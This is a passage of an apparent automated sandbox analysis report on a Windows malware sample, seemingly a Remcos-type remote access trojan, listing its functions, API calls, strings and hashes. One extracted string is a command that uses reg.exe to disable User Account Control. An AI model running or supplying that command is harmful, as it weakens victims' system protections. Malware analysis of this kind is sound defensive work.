                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$CreateProcess
                                                          • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                                          • API String ID: 2922976086-4183131282
                                                          • Opcode ID: 76fab65495b0fd8f7af94722782b38f5ec20939b495d63d65361185c7f15ad50
                                                          • Instruction ID: 0865c4136dfbb59e32125d892e445ee09242962a1e3dc4bc305b740a121ed375
                                                          • Opcode Fuzzy Hash: 76fab65495b0fd8f7af94722782b38f5ec20939b495d63d65361185c7f15ad50
                                                          • Instruction Fuzzy Hash: 68F090B690029D7ACB20ABD69C0EECF7F3CEBC5B11F01046ABA04A2051DA706104CAB8
                                                          Function 004064D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 40COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          • Rmc-JLQBNY, xrefs: 0040693F
                                                          • C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe, xrefs: 00406927
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: C:\Users\user\Desktop\1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da85346b6b949.dat-decoded.exe$Rmc-JLQBNY
                                                          • API String ID: 0-2036069771
                                                          • Opcode ID: 68549dc5139d56a2d1ebd5a20fc71dabf1e7981f7a57b1309e8f30a02d7c51f6
                                                          • Instruction ID: ac3f053366391772af188fc274efb03f25e4c049f181d6a95d7665767018bac5
                                                          • Opcode Fuzzy Hash: 68549dc5139d56a2d1ebd5a20fc71dabf1e7981f7a57b1309e8f30a02d7c51f6
                                                          • Instruction Fuzzy Hash: 4FF0F6B17022109BDB103B34AD1966A3A45DB40346F01807BF98BFA6E2DF7C8851C68C
                                                          Function 004427E9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0044279A,?,?,0044273A,?,0046EAF0,0000000C,00442891,?,00000002), ref: 00442809
                                                          • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044281C
                                                          • FreeLibrary.KERNEL32(00000000,?,?,?,0044279A,?,?,0044273A,?,0046EAF0,0000000C,00442891,?,00000002,00000000), ref: 0044283F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AddressFreeHandleLibraryModuleProc
                                                          • String ID: CorExitProcess$mscoree.dll
                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 263cd25904221f4c100099ecbb428eb8354416072efb1e7fc04c1483da550fa7
                                                          • Instruction ID: e557d05a47d06e8d32a7f66c2c4e22cdfb14d47a79db446b90f8ad9ee3cbc836
                                                          • Opcode Fuzzy Hash: 263cd25904221f4c100099ecbb428eb8354416072efb1e7fc04c1483da550fa7
                                                          • Instruction Fuzzy Hash: 8CF0A430900309FBDB119F94DD09B9EBFB4EB08753F4041B9F805A2261DF789D44CA98
                                                          Function 00404AB1 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,004755B0,00414F47,00000000,00000000,00000001), ref: 00404AED
                                                          • SetEvent.KERNEL32(00000304), ref: 00404AF9
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00404B04
                                                          • CloseHandle.KERNEL32(00000000), ref: 00404B0D
                                                            • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                                          • String ID: KeepAlive | Disabled
                                                          • API String ID: 2993684571-305739064
                                                          • Opcode ID: 87b3d8b3ec28cdfa47286890c680b6ef87dd714ebeb2c7092d66f3d4d30662f2
                                                          • Instruction ID: 7c4d48bbaa8a7164c3353f7df4ad5523490a6ea0f3ebe4e46dcacb08dafaa92a
                                                          • Opcode Fuzzy Hash: 87b3d8b3ec28cdfa47286890c680b6ef87dd714ebeb2c7092d66f3d4d30662f2
                                                          • Instruction Fuzzy Hash: 31F096B19047007BDB1137759D0B66B7F58AB46325F00096FF492A26F2DE39D8508B5E
                                                          Function 0041A128 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 0041A891: GetLocalTime.KERNEL32(00000000), ref: 0041A8AB
                                                          • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041A15A
                                                          • PlaySoundW.WINMM(00000000,00000000), ref: 0041A168
                                                          • Sleep.KERNEL32(00002710), ref: 0041A16F
                                                          • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041A178
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: PlaySound$HandleLocalModuleSleepTime
                                                          • String ID: Alarm triggered
                                                          • API String ID: 614609389-2816303416
                                                          • Opcode ID: 4a48c68418f768cffa6c3ed767b5f5e80af739637c9128b647918063f34aba9e
                                                          • Instruction ID: 198adcd2ac8b5b4b9acde76a755fda1533c143b191b85f9fe5233f4cbfc21951
                                                          • Opcode Fuzzy Hash: 4a48c68418f768cffa6c3ed767b5f5e80af739637c9128b647918063f34aba9e
                                                          • Instruction Fuzzy Hash: 79E01A22A04261379520337B7D0FD6F3D28EAC7B65741006FF905A6192EE580811C6FB
                                                          Function 0041C07A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041C10D), ref: 0041C084
                                                          • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041C10D), ref: 0041C091
                                                          • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041C10D), ref: 0041C09E
                                                          • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041C10D), ref: 0041C0B1
                                                          Strings
                                                          • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041C0A4
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Console$AttributeText$BufferHandleInfoScreen
                                                          • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                                          • API String ID: 3024135584-2418719853
                                                          • Opcode ID: 1559ced9db44309d12e9096fc874ef99716f3117c459c374921cc59209bdbdc6
                                                          • Instruction ID: f27d36e20d2a67c690befc106ea5cafab99e09d075a2dfca7d32a9b7008c9529
                                                          • Opcode Fuzzy Hash: 1559ced9db44309d12e9096fc874ef99716f3117c459c374921cc59209bdbdc6
                                                          • Instruction Fuzzy Hash: 57E04F62604348BBD30037F6AC4EDAB3B7CE784617B10092AF612A01D3ED7484468B79
                                                          Function 004403AA Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2a796732182faefe73add1043189caf6ca4f606f7631d49291716b08cb320153
                                                          • Instruction ID: 7c1105064789ab48ae90d42f937b6a9cbc34ac1ed42c20d541c6d1c3f1a57216
                                                          • Opcode Fuzzy Hash: 2a796732182faefe73add1043189caf6ca4f606f7631d49291716b08cb320153
                                                          • Instruction Fuzzy Hash: 7671D371900216AFEF20CF54C884ABFBB75EF45310F14422BEA15A7281DB788C61CFA9
                                                          Function 00410BF1 Relevance: 7.7, APIs: 5, Instructions: 198memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00410691: SetLastError.KERNEL32(0000000D,00410C10,?,00000000), ref: 00410697
                                                          • GetNativeSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410BED), ref: 00410C9C
                                                          • GetProcessHeap.KERNEL32(00000008,00000040,?,?,00000000), ref: 00410D02
                                                          • HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410D09
                                                          • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00410E17
                                                          • SetLastError.KERNEL32(000000C1,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00410BED), ref: 00410E41
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$Heap$AllocInfoNativeProcessSystem
                                                          • String ID:
                                                          • API String ID: 3525466593-0
                                                          • Opcode ID: 5b761030cf84cfef50a77e8f1fc708b710696a941d42968a3fbf92de24ca1f36
                                                          • Instruction ID: e2f64966b18619331c3eea81ef564f6afd9e4387f8ea08f62d3b86939114ae32
                                                          • Opcode Fuzzy Hash: 5b761030cf84cfef50a77e8f1fc708b710696a941d42968a3fbf92de24ca1f36
                                                          • Instruction Fuzzy Hash: 8E61E570200305ABD710AF56C981BA77BA5BF84308F04451EF909CB382DBF8E8D5CB99
                                                          Function 004432A8 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID:
                                                          • API String ID: 269201875-0
                                                          • Opcode ID: c6d5326bb826bef7d4312f682f8fd03de73532d4ef60da68ba97a8c78ea7af64
                                                          • Instruction ID: 036c3dfb054a6f01566e3cd8d28730a68c174e79056a6e67996f15c63748089b
                                                          • Opcode Fuzzy Hash: c6d5326bb826bef7d4312f682f8fd03de73532d4ef60da68ba97a8c78ea7af64
                                                          • Instruction Fuzzy Hash: F341D636A002049FEB20DF79C881A5EB7B5FF88718F1545AEE915EB351DA35EE01CB84
                                                          Function 004500E3 Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0043E5FD,?,00000000,?,00000001,?,?,00000001,0043E5FD,?), ref: 00450130
                                                          • __alloca_probe_16.LIBCMT ref: 00450168
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 004501B9
                                                          • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00439BCF,?), ref: 004501CB
                                                          • __freea.LIBCMT ref: 004501D4
                                                            • Part of subcall function 00446D0F: RtlAllocateHeap.NTDLL(00000000,00434613,?,?,00437437,?,?,?,?,?,0040CD5A,00434613,?,?,?,?), ref: 00446D41
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                          • String ID:
                                                          • API String ID: 313313983-0
                                                          • Opcode ID: daed02162d7f278869bfaea3c7a8f88d5c2a2d3218cc1490f903801f97ac0c2c
                                                          • Instruction ID: d7464a72994917abc30d80f71ec8451e4cba9cf5435b4dea42e63c5c2bdc5daf
                                                          • Opcode Fuzzy Hash: daed02162d7f278869bfaea3c7a8f88d5c2a2d3218cc1490f903801f97ac0c2c
                                                          • Instruction Fuzzy Hash: 9631E132A0060AABDF249F65DC41DAF7BA5EB00311F05416AFC04E7252EB3ACD54CBA5
                                                          Function 0044E34B Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetEnvironmentStringsW.KERNEL32 ref: 0044E354
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0044E377
                                                            • Part of subcall function 00446D0F: RtlAllocateHeap.NTDLL(00000000,00434613,?,?,00437437,?,?,?,?,?,0040CD5A,00434613,?,?,?,?), ref: 00446D41
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0044E39D
                                                          • _free.LIBCMT ref: 0044E3B0
                                                          • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0044E3BF
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                          • String ID:
                                                          • API String ID: 336800556-0
                                                          • Opcode ID: 1d4758ed0160ac471983c8ffd3a0470c3cf8fd4ea00c3cafbe93e28275fbbba9
                                                          • Instruction ID: 5f1b7bba735f2dc00ee4e6ee14e94985e19ed078b50b1d1b699098eccd63c47a
                                                          • Opcode Fuzzy Hash: 1d4758ed0160ac471983c8ffd3a0470c3cf8fd4ea00c3cafbe93e28275fbbba9
                                                          • Instruction Fuzzy Hash: D50171726017157F73221A776C88C7B6A6DEAC2F65315012EFD05D3241DE698C0291B9
                                                          Function 00447153 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • GetLastError.KERNEL32(0000000A,0000000B,0000000A,00445569,00440CA8,00000000,?,?,?,?,00440E8B,00000000,0000000A,000000FF,0000000A,00000000), ref: 00447158
                                                          • _free.LIBCMT ref: 0044718D
                                                          • _free.LIBCMT ref: 004471B4
                                                          • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 004471C1
                                                          • SetLastError.KERNEL32(00000000,0000000A,00000000), ref: 004471CA
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$_free
                                                          • String ID:
                                                          • API String ID: 3170660625-0
                                                          • Opcode ID: c73b76ca02ce190c9082a6036dde6ca48763b4b9e088bcde2ec0a65c3a46cc10
                                                          • Instruction ID: 9627307c59aa3692a64de8377ee3c20019e30fe80ec8d82769d3f9bfdfbdb6fb
                                                          • Opcode Fuzzy Hash: c73b76ca02ce190c9082a6036dde6ca48763b4b9e088bcde2ec0a65c3a46cc10
                                                          • Instruction Fuzzy Hash: 3E01F97624CB102BB30267B95C85D2B2A29DBC17B6726012FF509A6392EF2C8C07515D
                                                          Function 0041B588 Relevance: 7.5, APIs: 5, Instructions: 47COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041B5A0
                                                          • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041B5B3
                                                          • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000000,00000000), ref: 0041B5D3
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B5DE
                                                          • CloseHandle.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0041B5E6
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseHandleOpen$FileImageName
                                                          • String ID:
                                                          • API String ID: 2951400881-0
                                                          • Opcode ID: ef8d0d82becda269430901369212c52b3606b15fcf963f3a122b886808132bbc
                                                          • Instruction ID: 5d23c8c1f4703883972a4236376900cac23e2486f01e1b2fafccabe2f4d6955e
                                                          • Opcode Fuzzy Hash: ef8d0d82becda269430901369212c52b3606b15fcf963f3a122b886808132bbc
                                                          • Instruction Fuzzy Hash: D5F049712003167BD31167558C4AFABB66ECF40B9AF01002BF611E21A2EF74DDC146BD
                                                          Function 0044F9AD Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 0044F9C5
                                                            • Part of subcall function 00446CD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A), ref: 00446CEB
                                                            • Part of subcall function 00446CD5: GetLastError.KERNEL32(0000000A,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A,0000000A), ref: 00446CFD
                                                          • _free.LIBCMT ref: 0044F9D7
                                                          • _free.LIBCMT ref: 0044F9E9
                                                          • _free.LIBCMT ref: 0044F9FB
                                                          • _free.LIBCMT ref: 0044FA0D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.3753238214.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.3753223092.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753278972.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753301179.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000001.00000002.3753337251.0000000000477000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_1_2_400000_1736491685b40eefbc9bdfbc98216071e6ff3a4c19c7e1ab8a144cde35036665da8534.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 8a0a0e5e94a0327d1776c165067cf9b9603f8d21362122b3839296c578ae3d6e
                                                          • Instruction ID: 2de1f51a18cc7960585f1cc37bbb46b0208bdbaa703fd0d38dd13c161260ee8b
                                                          • Opcode Fuzzy Hash: 8a0a0e5e94a0327d1776c165067cf9b9603f8d21362122b3839296c578ae3d6e
                                                          • Instruction Fuzzy Hash: B5F012725042107BA620DF59FAC6D1773E9EA457247A5482BF18DEBA51C738FCC0865C
                                                          Function 004434F7 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00443515
                                                            • Part of subcall function 00446CD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A), ref: 00446CEB
